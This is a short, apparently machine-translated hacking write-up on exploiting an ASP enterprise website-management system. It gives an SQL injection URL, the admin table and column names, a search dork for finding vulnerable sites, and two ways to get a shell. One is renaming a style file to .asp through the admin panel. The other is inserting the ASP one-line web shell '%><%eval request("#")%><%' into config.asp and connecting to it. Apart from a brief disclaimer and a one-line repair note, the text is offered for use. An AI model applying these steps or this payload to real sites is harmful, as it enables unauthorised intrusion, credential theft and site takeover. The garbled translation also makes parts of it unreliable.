Author: Mr. DzY
Increase the style with the site table of the Association;
Background: admin/login. asp if does not exist, the self-guess solution.
Injection point:http://www. xxxx. net/index. asp? subsite=1
In tool to increase the table name: dcore_user column name: user_admin user_password
If not afraid of trouble, also you can manually guess the solution.
Get the shell methods:
Background--->style Manager--->choose any style modifications as Mr. DzY. asp--->edit skin.
Test keywords: inurl:dynamic.asp?/1-2-17.html
A lot of their structure. Or that old words, the law does not allow, please do not illegally hacking into the site and the destruction of others data.
This article is only for technology exchange. Its caused by the consequences themselves. I am not responsible for it.
Repair method: the enhanced password strength/filtering illegal characters/modify the default path
By this 0DAY is very easy to take down the SHELL. Thank the ancestors for dedication huh?
Then see the procedure found in the root directory of the file config. asp, is the site configuration, that is the background to directly modify the site configuration information is written Word will be able to connect, and the South data enterprise website management system background like
Directly in the version information added on the"%><%eval request("#")%><%' added after, does not display the code, or the original look, but in fact can already.
Directly behind the word connection of the http://wwww. xxxx. net/config. asp